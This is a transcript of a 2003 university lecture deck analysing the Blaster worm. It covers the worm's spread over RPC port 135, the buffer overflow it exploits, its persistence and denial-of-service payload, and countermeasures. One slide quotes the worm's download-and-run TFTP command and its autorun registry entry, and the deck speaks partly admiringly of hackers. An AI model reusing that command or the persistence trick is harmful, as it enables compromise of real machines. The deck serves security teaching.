Presentation is loading. Please wait.

Presentation is loading. Please wait.

Analysis of the Internet Worm of August 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Dr. K. Salah September 2003.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Analysis of the Internet Worm of August 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Dr. K. Salah September 2003."— Presentation transcript:

1 Analysis of the Internet Worm of August 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Dr. K. Salah September 2003

2 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Agenda Reasons for Talk Some Jargon Ethics of Hackers Why Can’t Our Kids Hack? Example of Hacker Attacks W32 Blaster Worm Smashing the Stack for Fun and Profit More Information

3 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Reasons of Talk Know Your Enemy! –Prophet of Islam says, “من تعلم لغة قوم أمن مكرهم ” –“Know your enemy and know yourself and you can fight a hundred battles without disaster,” Sun Tzu. Knowledge is power! –Understand hack tactics, strategies, and tricks. –Be better prepared –Design and write better code –Take countermeasures. Know something about the ethics of hackers Testify how smart the hackers are! Research

4 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Some Jargon Hoax vs. Worm vs. Virus Trojan Horse Crackers vs. Hackers vs. Intruder DOS attack

5 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 The Hacker Ethic Hackers have ethics, according to Socrates. "The Hacker Ethic", by Pekka Himanen, Linus Torvalds, and Manuel Castells. –Translated into 15 languages –Hackers are the warriors, explorers, guerrillas, and joyous adventurers of the Digital Age, and the true architects of the new economy. Demonized and often misunderstood, they are changing the world and the way it works. –Hackers are curious and often smart. They might not agree with a law, or offer a different interpretation, or act in ways the law doesn't cover. –http://www.hackerethic.org –http://www.ils.unc.edu/gbnewby/ethics/index.html Why hacking? Enjoy the challenge and excitement Joy, fun, ego, and recognition Hate Microsoft products and practices –The battle with google.com has started

6 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Hacker Ethics Information should be free –Driving Linux/Apache and Open Source Code –Technology is only good if you get other people join you developing and using it. Info should always be disclosed. –Not all people can afford to buy software or information –No cocern for copyright laws/abuses, intellectual property, passwords, data security! Hacking is essential to show security holes and vulnerabilities –So many hackers are security gurus –A way to make living and learn about computers Hackers are not doing real harm –Pushing technology to its knees –“We are just curious and inquistitve people… we want to chart new territory and look around,” Craig Neidorf –Craig Neidorf is the founder of Phrack Magazine and member of the 2600 club. His email is route@underground.org

7 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Kids and Hacking Kids are very curious, thus are hackers. Have much more time, less responsibilities! They look for recognition and fun Usually kids fall victims and get caught first Originators of attacks are yet to be found What does it really take to be a hacker? –Some knowledge of C and Assembly programming –Some knowledge of OS –Some knowledge of Networking (TCP/IP) –(Beware!!! These are our ICS and COE students!!!)

8 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Kids and Hacking

9 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Kids and Hacking Connected to www.test.com www.test.com

10 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Kids and Hacking Shall we give up hope? –The 1998 registrar incident So, why can’t Our kids hack? –Digital Divide –English –Busy and distracted….

11 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Fun, Attacks, or Damages

12 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Fun, Attacks, or Damages

13 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Fun, Attacks, or Damages August 17, 1996

14 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Fun, Attacks, or Damages August 14, 2003

15 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Fun, Attacks, or Damages August 14, 2003

16 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 The Blaster Worm Affected Windows XP and Windows 2000 Causes Windows NT to crash when trying to exploit NT machines Has so many variants: Blaster-A, Blaster-B, …Blaster-F –Blaster-F was linked to a Romanian student This is a worm, not a virus. Eating up network bandwidth. Encouraged other hackers to release other worms: Sobig, Welchia, etc. Microsoft called it, “A security issue has been identified…”

17 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Technical Details 1) An infected system scans the network for any computer listening to TCP port 135 (Windows RPC/DCOM port). –TCP port 135 used for Microsoft Active Directory and Microsoft Exchange mail servers, among other things. –“The Art of Port Scanning” by fyodor@dhp.com Phrack Magazine, http://www.phrack.org/show.php?p=51&a=11

18 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Technical Details 2) The infected system attempts to exploit the RPC buffer overflow on those systems listening to TCP port 135. –Buffer Overflow Attack will be explained later

19 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Technical Details 3) The buffer overflow includes code which causes the victim to open a cmd.exe shell (an egg) and cause it to (hatch): –starts a TFTP session with the attacker between ports 4444 and 69 to download a copy of the worm “msblast.exe” –Inside the shell code, do a command: “cmd \c tftp –i appaddress worm.exe & worm.exe & exit” –“msblast.exe” is packed with UPX compression utility, self-extracting and is 11KB once unpacked.

20 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Technical Details 4) “msblast.exe” gets executed and starts the scanning process for those computers listening on TCP port 135. –A text string in the worm code reads, “I just want to say LOVE YOU SAN!! Billy gates why do you make this possible? Stop making money and fix your software!!” –The code creates a mutex called “BILLY” to avoid running multiple times. –It also adds an entry to always run on Windows restart SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = "msblast.exe“

21 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Technical Details A secondary payload in the worm is supposedly to cause all infected systems to launch a DOS attack against MS windowsupdate.com website on 16August 2003. –Why August 16? –Any relation to the DOJ Hack? If the worm cannot find a DNS entry for windowsupdate.com, it uses 255.255.255.255, causing broadcast traffic and flooding the network.

22 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack First Rule of Hacking: Do everything you are not supposed to? –If you can’t change the flow of execution, crash it! Started with Robert Morris worm in 1988 exploiting a buffer overflow vulnerability in fingerd. Code Red worm of 2001, exploiting a buffer overflow vulnerability in Mircosoft IIS (Internet Information Server). The new MS Blaster of 2003, exploiting a buffer overflow vulnerability in MS DCOM/RPC. The next attack will be most likely linked to buffer overflow CERT Security Alert by Years– upto the first 2 months of 2002

23 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack Best article on the know-how details of the buffer overflow can be found in Phrack Magazine (issue 49) titled, published in 1996: http://www.phrack.org/show.php?p=49&a=14 “Smashing the Stack for Fun and Profit,” by AlephOne@underground.org

24 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack

25 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack

26 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack Partial List of Unsafe Functions in the Standard C Library:

27 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack Countermeasures Validate all arguments or parameters received whenever you write a function. –Bounds checking –Performance is compromised!! Use secure functions instead, e.g., strncpy() and strncat() Use safe compilers –Watch out for free compilers!!! Can be made by hackers, for hackers! Test your code thoroughly Keep applying patches Good site for advisory is CERT at Carnegie Mellon SWE Institute –http://www.cert.org/advisories Can this attack be ever eliminated?

28 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 R e s e a r c h on Protecting the Stack Good number of references is found in: –http://www.crhc.uiuc.edu/EASY/Papers02/EASY02-xu.pdf How? –Splitting control stack from data stack Control stack contains return addresses Data stack contains local variables and passed parameters –Use middleware software (libsafe) to intercept calls to libray functions known to be vulnerable. –Using StackGuard and StackShield Adding more code at the beginning and end of each function Check to see if ret address is altered and signal a violation –Others –Performance due to overhead is always as issue!

29 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 The Adventure Continues Bypassing the fix for smashing the stack –Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle and Erik Walthinsen. Protecting Systems from Stack Smashing Attacks with StackGuard http://www.immunix.org/documentation.html –In May 2000 issue of Phrack Magazine (www.phrack.org) “Bypassing StackGuard and StackShield” by Bulba and Kil3r

30 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Curious about More Hacking Techniques Compulsory Reading "Hacking Exposed"

31 September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 A copy of this PPT presentation can be found at –http://www.ccse.kfupm.edu.sa/~salah Under the MISC section

Download ppt "Analysis of the Internet Worm of August 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Dr. K. Salah September 2003."

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Tips and tools to keep you and your information safe on-line. We will go over a lot of information today, so it is important to pay attention and follow.

Tips and tools to keep you and your information safe on-line. We will go over a lot of information today, so it is important to pay attention and follow.
Tips and tools to keep you and your information safe on-line. We will go over a lot of information today, so it is important to pay attention and follow.

Tips and tools to keep you and your information safe on-line. We will go over a lot of information today, so it is important to pay attention and follow.
Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.

Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
ICT & Crime Data theft, phishing & pharming. Data loss/theft Data is often the most valuable commodity any business has. The cost of creating data again.

ICT & Crime Data theft, phishing & pharming. Data loss/theft Data is often the most valuable commodity any business has. The cost of creating data again.
Acceptable Use Policy –The Acceptable Use Policy defines the rules of the machine and internet connection you are on. –Specific policies differ by machine.

Acceptable Use Policy –The Acceptable Use Policy defines the rules of the machine and internet connection you are on. –Specific policies differ by machine.
K. Salah1 Buffer Overflow The crown jewel of attacks.

K. Salah1 Buffer Overflow The crown jewel of attacks.
Viruses,Hacking and Backups By Grace Mackay 8K Viruses Hacking and Hackers Backups.

Viruses,Hacking and Backups By Grace Mackay 8K Viruses Hacking and Hackers Backups.
CHAPTER 2 KNOW YOUR VILLAINS. Who writes it: Malware writers vary in age, income level, location, social/peer interaction, education level, likes, dislikes.

CHAPTER 2 KNOW YOUR VILLAINS. Who writes it: Malware writers vary in age, income level, location, social/peer interaction, education level, likes, dislikes.
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?

1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Computer Viruses.

Computer Viruses.
Cyber Threat Analysis  Intrusions are actions that attempt to bypass security mechanisms of computer systems  Intrusions are caused by:  Attackers accessing.

Cyber Threat Analysis  Intrusions are actions that attempt to bypass security mechanisms of computer systems  Intrusions are caused by:  Attackers accessing.
 Population: N=100,000  Scan rate  = 4000/sec, Initially infected: I 0 =10  Monitored IP space 2 20, Monitoring interval:  = 1 second Infected hosts.

 Population: N=100,000  Scan rate  = 4000/sec, Initially infected: I 0 =10  Monitored IP space 2 20, Monitoring interval:  = 1 second Infected hosts.
Security: Attacks. 2 Trojan Horse Malicious program disguised as an innocent one –Could modify/delete user’s file, send important info to cracker, etc.

Security: Attacks. 2 Trojan Horse Malicious program disguised as an innocent one –Could modify/delete user’s file, send important info to cracker, etc.
Buffer Overflow By: John Quach and Napoleon N. Valdez.

Buffer Overflow By: John Quach and Napoleon N. Valdez.
Yan Chen Dept. of Computer Science Northwestern University Information Security Curriculum Development in Northwestern.

Yan Chen Dept. of Computer Science Northwestern University Information Security Curriculum Development in Northwestern.
The MS Blaster worm Presented by: Zhi-Wen Ouyang.

The MS Blaster worm Presented by: Zhi-Wen Ouyang.
Computer Security Fundamentals by Chuck Easttom Chapter 5 Malware.

Computer Security Fundamentals by Chuck Easttom Chapter 5 Malware.

Similar presentations

Ads by Google